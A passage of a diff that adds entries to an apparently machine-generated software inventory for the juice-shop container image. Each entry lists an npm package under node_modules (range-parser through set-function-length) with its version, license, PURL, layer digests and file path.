"AnalyzedBy": "node-pkg" + }, + { + "ID": "range-parser@1.2.1", + "Name": "range-parser", + "Identifier": { + "PURL": "pkg:npm/range-parser@1.2.1", + "UID": "c51007d3fad1de5b" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/range-parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "range_check@2.0.4", + "Name": "range_check", + "Identifier": { + "PURL": "pkg:npm/range_check@2.0.4", + "UID": "ab5ac0d40f6d166b" + }, + "Version": "2.0.4", + "Licenses": [ + "BSD-2-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/range_check/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "raw-body@2.5.3", + "Name": "raw-body", + "Identifier": { + "PURL": "pkg:npm/raw-body@2.5.3", + "UID": "53f766332e903863" + }, + "Version": "2.5.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/raw-body/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "rc@1.2.8", + "Name": "rc", + "Identifier": { + "PURL": "pkg:npm/rc@1.2.8", + "UID": "7e96bfcc72684dd6" + }, + "Version": "1.2.8", + "Licenses": [ + "(BSD-2-Clause OR MIT OR Apache-2.0)" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/rc/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "readable-stream@1.0.34", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@1.0.34", + "UID": "89ec01b3d01a99e7" + }, + "Version": "1.0.34", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sanitize-html/node_modules/readable-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "readable-stream@2.3.8", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@2.3.8", + "UID": "ad0e7bf8ec3f0190" + }, + "Version": "2.3.8", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/readable-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "readable-stream@3.6.2", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@3.6.2", + "UID": "fea93325b75491d" + }, + "Version": "3.6.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/readable-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "readable-stream@3.6.2", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@3.6.2", + "UID": "3fdb60b4aab56b9a" + }, + "Version": "3.6.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tar-fs/node_modules/readable-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "readable-stream@3.6.2", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@3.6.2", + "UID": "9cda42ca425944f4" + }, + "Version": "3.6.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/winston-transport/node_modules/readable-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "readable-stream@3.6.2", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@3.6.2", + "UID": "9853486b76bba685" + }, + "Version": "3.6.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/winston/node_modules/readable-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "readable-stream@4.7.0", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@4.7.0", + "UID": "59c701f7d9463dd0" + }, + "Version": "4.7.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/readable-web-to-node-stream/node_modules/readable-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "readable-web-to-node-stream@3.0.4", + "Name": "readable-web-to-node-stream", + "Identifier": { + "PURL": "pkg:npm/readable-web-to-node-stream@3.0.4", + "UID": "ebef477cc4d1cf81" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/readable-web-to-node-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "rechoir@0.7.1", + "Name": "rechoir", + "Identifier": { + "PURL": "pkg:npm/rechoir@0.7.1", + "UID": "1790843729a45aaa" + }, + "Version": "0.7.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/rechoir/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "recursedir-comparisons@0.0.0", + "Name": "recursedir-comparisons", + "Identifier": { + "PURL": "pkg:npm/recursedir-comparisons@0.0.0", + "UID": "c12abaf05475c21c" + }, + "Version": "0.0.0", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/walkdir/test/comparison/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "regexp.prototype.flags@1.5.4", + "Name": "regexp.prototype.flags", + "Identifier": { + "PURL": "pkg:npm/regexp.prototype.flags@1.5.4", + "UID": "f4fe331b426f44b8" + }, + "Version": "1.5.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/regexp.prototype.flags/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "remove-trailing-separator@1.1.0", + "Name": "remove-trailing-separator", + "Identifier": { + "PURL": "pkg:npm/remove-trailing-separator@1.1.0", + "UID": "9154c2d8fba30a83" + }, + "Version": "1.1.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/remove-trailing-separator/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "replace@1.2.2", + "Name": "replace", + "Identifier": { + "PURL": "pkg:npm/replace@1.2.2", + "UID": "6c1783589070ada1" + }, + "Version": "1.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "require-directory@2.1.1", + "Name": "require-directory", + "Identifier": { + "PURL": "pkg:npm/require-directory@2.1.1", + "UID": "4a39b262ccdc2692" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/require-directory/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "require-main-filename@2.0.0", + "Name": "require-main-filename", + "Identifier": { + "PURL": "pkg:npm/require-main-filename@2.0.0", + "UID": "25b5d29d9a6b8875" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/require-main-filename/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "resolve@1.22.12", + "Name": "resolve", + "Identifier": { + "PURL": "pkg:npm/resolve@1.22.12", + "UID": "8b46e79350816f5a" + }, + "Version": "1.22.12", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/resolve/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "resolve-dir@1.0.1", + "Name": "resolve-dir", + "Identifier": { + "PURL": "pkg:npm/resolve-dir@1.0.1", + "UID": "2911d26d75ff4269" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/resolve-dir/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "responselike@1.0.2", + "Name": "responselike", + "Identifier": { + "PURL": "pkg:npm/responselike@1.0.2", + "UID": "5f39fcc02dc4f071" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/responselike/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "restructure@2.0.1", + "Name": "restructure", + "Identifier": { + "PURL": "pkg:npm/restructure@2.0.1", + "UID": "93ebb1d51e300837" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/restructure/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "retry@0.12.0", + "Name": "retry", + "Identifier": { + "PURL": "pkg:npm/retry@0.12.0", + "UID": "9a7f94669d5dfadd" + }, + "Version": "0.12.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/retry/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "retry-as-promised@7.1.1", + "Name": "retry-as-promised", + "Identifier": { + "PURL": "pkg:npm/retry-as-promised@7.1.1", + "UID": "1d7a4357b3761806" + }, + "Version": "7.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/retry-as-promised/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "rimraf@2.7.1", + "Name": "rimraf", + "Identifier": { + "PURL": "pkg:npm/rimraf@2.7.1", + "UID": "ca2f88a79c05e822" + }, + "Version": "2.7.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/rimraf/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "rimraf@3.0.2", + "Name": "rimraf", + "Identifier": { + "PURL": "pkg:npm/rimraf@3.0.2", + "UID": "490b5743c3034b67" + }, + "Version": "3.0.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@npmcli/move-file/node_modules/rimraf/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "rimraf@3.0.2", + "Name": "rimraf", + "Identifier": { + "PURL": "pkg:npm/rimraf@3.0.2", + "UID": "1ea317c09b2a2e64" + }, + "Version": "3.0.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/rimraf/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "safe-buffer@5.1.2", + "Name": "safe-buffer", + "Identifier": { + "PURL": "pkg:npm/safe-buffer@5.1.2", + "UID": "bcc1c07a2818e63e" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/basic-auth/node_modules/safe-buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "safe-buffer@5.1.2", + "Name": "safe-buffer", + "Identifier": { + "PURL": "pkg:npm/safe-buffer@5.1.2", + "UID": "effba8d3b53399fe" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/readable-stream/node_modules/safe-buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "safe-buffer@5.1.2", + "Name": "safe-buffer", + "Identifier": { + "PURL": "pkg:npm/safe-buffer@5.1.2", + "UID": "f05d04e7b0377847" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/string_decoder/node_modules/safe-buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "safe-buffer@5.2.1", + "Name": "safe-buffer", + "Identifier": { + "PURL": "pkg:npm/safe-buffer@5.2.1", + "UID": "3aa476d87363be88" + }, + "Version": "5.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/safe-buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "safe-regex-test@1.1.0", + "Name": "safe-regex-test", + "Identifier": { + "PURL": "pkg:npm/safe-regex-test@1.1.0", + "UID": "d21b2d2e5b38d07f" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/safe-regex-test/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "safe-stable-stringify@2.5.0", + "Name": "safe-stable-stringify", + "Identifier": { + "PURL": "pkg:npm/safe-stable-stringify@2.5.0", + "UID": "eba18da1d67a0365" + }, + "Version": "2.5.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/safe-stable-stringify/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "safer-buffer@2.1.2", + "Name": "safer-buffer", + "Identifier": { + "PURL": "pkg:npm/safer-buffer@2.1.2", + "UID": "66a48e51d4592d64" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/safer-buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "sanitize-filename@1.6.4", + "Name": "sanitize-filename", + "Identifier": { + "PURL": "pkg:npm/sanitize-filename@1.6.4", + "UID": "750dffe9729ba819" + }, + "Version": "1.6.4", + "Licenses": [ + "WTFPL OR ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sanitize-filename/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "sanitize-html@1.4.2", + "Name": "sanitize-html", + "Identifier": { + "PURL": "pkg:npm/sanitize-html@1.4.2", + "UID": "940b6e3c5240d67a" + }, + "Version": "1.4.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sanitize-html/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "sax@1.6.0", + "Name": "sax", + "Identifier": { + "PURL": "pkg:npm/sax@1.6.0", + "UID": "a508a05eb90188da" + }, + "Version": "1.6.0", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sax/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "seek-bzip@1.0.6", + "Name": "seek-bzip", + "Identifier": { + "PURL": "pkg:npm/seek-bzip@1.0.6", + "UID": "681601488928c469" + }, + "Version": "1.0.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/seek-bzip/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "semver@5.7.2", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@5.7.2", + "UID": "63fd64b869ef6ebd" + }, + "Version": "5.7.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/make-dir/node_modules/semver/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "semver@5.7.2", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@5.7.2", + "UID": "710c335bfab2cc18" + }, + "Version": "5.7.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-abi/node_modules/semver/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "semver@5.7.2", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@5.7.2", + "UID": "2f7012574fa2c29b" + }, + "Version": "5.7.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-pre-gyp/node_modules/semver/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "semver@7.8.0", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@7.8.0", + "UID": "ee5812ccc239115c" + }, + "Version": "7.8.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/semver/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "send@0.19.2", + "Name": "send", + "Identifier": { + "PURL": "pkg:npm/send@0.19.2", + "UID": "4972036b7451943d" + }, + "Version": "0.19.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/send/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "sequelize@6.37.8", + "Name": "sequelize", + "Identifier": { + "PURL": "pkg:npm/sequelize@6.37.8", + "UID": "28903429e06aae74" + }, + "Version": "6.37.8", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sequelize/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "sequelize-pool@7.1.0", + "Name": "sequelize-pool", + "Identifier": { + "PURL": "pkg:npm/sequelize-pool@7.1.0", + "UID": "34a5038873763452" + }, + "Version": "7.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sequelize-pool/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "serve-index@1.9.2", + "Name": "serve-index", + "Identifier": { + "PURL": "pkg:npm/serve-index@1.9.2", + "UID": "737867bce1969566" + }, + "Version": "1.9.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/serve-index/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "serve-static@1.16.3", + "Name": "serve-static", + "Identifier": { + "PURL": "pkg:npm/serve-static@1.16.3", + "UID": "54f217b46766949b" + }, + "Version": "1.16.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/serve-static/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "set-blocking@2.0.0", + "Name": "set-blocking", + "Identifier": { + "PURL": "pkg:npm/set-blocking@2.0.0", + "UID": "e3e1263c39d98f7c" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/set-blocking/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "set-function-length@1.2.2", + "Name": "set-function-length", + "Identifier": { + "PURL": "pkg:npm/set-function-length@1.2.2", + "UID": "50b848a7ec345c78" + }, + "Version": "1.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/set-function-length/package.json", + "AnalyzedBy": "node-pkg" + }, + { 